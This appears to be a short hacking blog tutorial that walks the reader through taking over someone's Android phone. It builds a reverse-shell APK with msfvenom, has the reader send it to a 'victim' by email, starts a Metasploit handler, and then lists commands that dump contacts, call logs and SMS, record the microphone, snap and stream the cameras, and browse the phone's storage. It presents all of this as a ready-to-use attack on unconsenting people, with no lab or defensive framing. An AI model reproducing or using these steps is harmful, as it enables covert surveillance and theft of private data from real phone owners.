...... By Jon Erickson.
So Welcome to TekTuts,
in this post I am going to share with you step by step tutorial to hack anyones mobiles
in this post I am going to share with you step by step tutorial to hack anyones mobiles
Step By Step Guide:
- Start Kali Linux
- Open Terminal (Press Ctrl +Alt+T)
- Type sudo -i to give it root user privilage.
- Then enter your password.
- Then type ifconfig to get your ip addresss.
- copy your ip address which will be shown in wlan0 part and in front of inet . Copy by selecting and then pressing (Ctrl + Shift + C).
- Now start msfconsole by typing msfconsole . It will take time.
- Now it will show msf command prompt.
- Type msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip_address(press Ctrl+Shift+V) LPORT=4444 R > Hack.apk
- This will generate payload which will be saved in root directory . So open file explorer and Go to Other Locations and then Computer and search for Hack.apk
- Now copy this Hack.apk file and send it to your victim through gmail or any other route.
- Now we need to handle victim . So start handler by typing use exploit/multi/handler
- Now it will show exploit handler prompt.
- type set payload android/meterpreter/reverse_tcp
- the type set LHOST your_ip_address(press Ctrl+Shift+V)
- next type set LPORT 4444
- Now all settings are set , we need to start exploit and wait for victim to install apk in their phone.
- type exploit.
- and wait until it says session opened.
- Now we have Hacked victims mobile . So now We can access anything from their mobile.
- Type dump_contacts to get contacts from their mobile. Contacts will be dumped in text file.
- type dump_calllog to get their call history . This will also be saved in another text file.
- type dump_sms to get sms history. It will also be saved in another text file.
- you can record audio by typing record_mic
- type webcam_list to see list of cameras.
- type ipconfig or ifconfig to get list of all interfaces i.e. ip address and all.
- type check_root to check whether device is rooted or not.
- type ps to see processes running.
- type sysinfo to get information of victim system.
- type webcam_snap to take snap from their mobile.
- we can also specify , which camera to use.
- for using front camera type webcam_snap -i 1
- and to use rear camera type webcam_snap -i 2
- We can even change quality of snap by appending -q followed by 100
- We can even start live stream from their camera.
- type webcam_stream -i 2 -q 100 to use rear camera and if you want to use front then change 2 to 1
- Now it will be streaming video on site location of which is shown in terminal as .html extension.
- Double click on html file which will redirect you to the browser. Where video is streaming.
- You can get into sdcard i.e. memory by typing shell .
- .type exit to exit from sdcard.
- type help to get list of all commads.
- Then you can navigate in sdcard by using following commands.
- type ls to list down all files and directory.
- type cd followed by name of directory to change current working directory.
- type pwd to print current working directory.
- to see text inside any text file we can type cat follwed by text file.
- cd - to change directory to previous directory.
- cd / to change directory to home directory.
Thanks buddy for Reading .
#TekTuts
If you want you can even watch video by TekTuts to hack anyones mobiles ,link of which is provided below .